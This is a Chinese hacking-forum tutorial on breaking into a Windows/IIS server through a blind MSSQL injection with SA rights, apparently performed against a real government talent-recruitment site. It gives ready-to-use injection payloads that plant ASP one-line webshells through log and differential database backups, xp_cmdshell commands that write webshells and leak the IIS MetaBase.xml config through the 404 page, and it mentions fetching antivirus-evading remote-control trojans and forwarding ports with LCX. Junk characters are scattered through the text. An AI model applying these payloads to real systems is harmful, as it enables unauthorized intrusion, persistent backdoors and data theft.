sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
5 o# Y5 D0 Y3 k( r& O: X
# ]: z/ B9 h# N6 w: z
                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
" K* s" v, @1 N0 \
                                                                 
                                                                 
                                                                  论坛： http://www.90team.net/



友情检测国家人才网
7 ~+ {4 a- Y6 Y% z' S9 }3 l1 {6 W

6 A3 Y) S! V( l* N" B内容：MSSQL注入SA权限不显错模式下的入侵
; J9 y+ J. t& [& L7 w3 B- }

一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
. c: R: X6 o9 E1 R& F! D

$ u, _1 f" A6 T- Y$ S" ]这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。

; x/ u0 Y/ L) q/ K" W思路：
7 X% ?+ R, [  z+ p2 |
8 Y8 ~0 B1 ?5 r1 d首先：
0 s  L8 }; ^# S' z" @
4 ]4 p2 q9 Y: P; W( D7 j' H通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

. r& ]  x4 E7 T  n9 S1.日志备份获得Webshell
! ]/ z, ~: ]7 ^. B5 S
2.数据库差异备份获得Webshell
8 u* n( K9 I) o8 f
" y( U3 m/ s1 }! V4.直接下载免杀远控木马。
) X( v, ~5 b/ V2 O6 j) y
4 O# I2 q7 z& |9 w8 s* F5.直接下载LCX将服务器端口转发出来
* G# K% N/ R( D1 s( U2 `0 @% Y! ^
6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
, E% }8 h: X0 h8 t2 L# h4 s( g
0 `: V- R& s; A! b
2 c4 U* @5 q) ]/ }% V
在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，

5 z8 o2 ^9 b- ~1 G我直接演示后面一个方法
; s) c  x+ n( O2 D: }& R( d' H

) [, ~  f% |5 u& O& {分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL


6 `/ }- z+ I$ U+ l

◆日志备份：

( m, I+ q% c: M6 ~# f& m  l
4 o7 r) f$ Q8 Z9 J; i0 u  _1. 进行初始备份
* \5 g) X% o/ M; i1 j. N; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
' k' W! H9 [- T
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
3. 备份并获得文件，删除临时表
" k6 J  W( |* h8 [5 T;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
- K8 v. w# T1 B" o$ w, s  {


◆数据库差异备份

1 T- M6 k' s; ]（1. 进行差异备份准备工作

. M7 \2 m1 v- V; {, x3 r: N) W;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
4 j& c" E# L% L" C; z/ Q( r+ ^% L
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
& d4 w; }3 O* d
9 y* `; }& g$ f& l. r4 {0 x4 z
6 B. Q( r) i- n6 q（2. 将数据写入到数据库
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
* p/ Z1 d0 `1 b
3. 备份数据库并清理临时文件
+ D' T) N6 }2 N/ \# T: Y8 [
* a8 B. m# ]% L0 B8 |- B;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

" K( a9 J3 o* s3 Y0x633A5C746573742E617370  为 c:\test.asp  删除临时文件

$ |0 a2 z- h: v( C
  T/ X5 K. R% `5 g" @$ Z7 V3 b: q% `" j
用^转义字符来写ASP(一句话木马)文件的方法:   
9 y8 f  p" g4 g6 p: ~- t
" f. e; `4 e1 q/ h; Y' J8 F1 R1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
6 B* ~, B+ C, s! P7 n' n: {. F' P) {
5 x- U! w; N1 h1 F! ?0 J# s: J: \0 s- a4 ~, k读取IIS配置信息获取web路径
. F) I) H+ W" f; s0 t3 a9 {/ a6 o
/ X, W5 x8 w3 J+ M& R2 H4 V     
2 N; L( ]' f* b. f( I0 Y3 n     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
0 {! K( B: f* j8 o5 t% U( X
执行命令
; D5 d5 @- I. V4 k9 S, F/ ?     
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--

2 I4 @0 O+ n9 o9 T' N
. B7 q; A1 |  M; T  H4 ?; ^4 {

7 b  P3 H  i$ B0 R) V, z$ b

# [* x8 s# l1 D2 r  \% |( L" H

: x0 f% w" s! z& G% E8 k1 i; m

, D2 ]$ {6 B8 K" t* y
- X. E/ m! r; d* y6 W# I* \

) Y; ^# Z& m( B! Q; O
, A! U* _8 P- E* e* a- v4 W& q
4 C1 Y2 X  G/ t- I* t! A: R7 U' m* C


  i$ W7 p8 M3 d( P' A




) q2 A1 I- L2 w# I3 L
; {( ~  j- |5 b3 {8 [; G) \/ W



) A: J9 L4 x! q; G: }+ p


$ k7 K. p# R2 D/ `2 k. J


2 M" |9 e2 s0 b  P$ \



" o% f3 k& f& }6 u0 [

  r# q( j% E) ]1 D! p3 L, [

. m$ ]- g+ f' j7 B! x$ w


7 K" V% R( U9 S( p1 P
/ S2 u9 Q: q: D5 _8 C$ @/ p1 B